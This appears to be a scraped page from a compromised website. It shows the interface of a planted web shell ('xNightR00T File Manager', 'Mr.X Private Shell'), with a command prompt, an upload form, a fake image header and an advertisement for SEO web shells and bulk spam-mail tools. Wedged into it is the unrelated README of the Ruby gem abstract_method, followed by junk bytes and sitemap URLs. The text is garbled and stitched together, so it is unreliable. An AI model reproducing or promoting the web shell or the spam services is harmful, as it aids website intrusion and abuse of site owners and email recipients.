xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
Abstract Method
===============

Abstract Method is a tiny library enabling you to define abstract methods in
Ruby classes and modules.

Example
-------

```ruby
class AbstractClass
  abstract_method :foo
end

class ConcreteClass < AbstractClass
  def foo
    42
  end
end

AbstractClass.new.foo # raises AbstractMethodCalled
ConcreteClass.new.foo # => 42
```

Installation
------------

    $ gem install abstract_method

Usage
-----

First, require the library:

```ruby
require "abstract_method"
```

You can now use the `abstract_method` method to define abstract methods in
classes and modules.

```ruby
class AbstractClass
  abstract_method :foo
end

class AbstractModule
  abstract_method :bar
end
```

When called, the abstract method will raise an `AbstractMethodCalled` exception
with a helpful message:

```ruby
AbstractClass.new.foo # raises AbstractMethodCalled with the following message:
                      #   Called unimplemented abstract method AbstractClass#foo
                      #   (defined in class AbstractClass).
```

Abstract methods can be overridden as usual:

```ruby
class ConcreteClass < AbstractClass
  def foo
    42
  end
end

ConcreteClass.new.foo # => 42
```

For more information, see the [API
documentation](http://rubydoc.info/github/openSUSE/abstract_method/frames).

FAQ
---

**Why define abstract methods? In a dynamic language like Ruby they aren't
needed.**

Mainly for documentation purposes. The definitions allow subclass authors to
easily see what they need to implement. They are also a great place to attach
documentation.

**Why create a new library? There is already the
[abstract](http://rubygems.org/gems/abstract) gem.**

With the abstract gem you have to specify the abstract method parameter list in
a string when you define it. This is ugly and in Ruby the parameter list often
does not say much about the method anyway. The parameters should should rather
be described using a code documentation system (such as
[YARD](http://yardoc.org/)).

Filemanager

Name Type Size Permission Actions
LICENSE File 1.02 KB 0644
README.md File 1.96 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml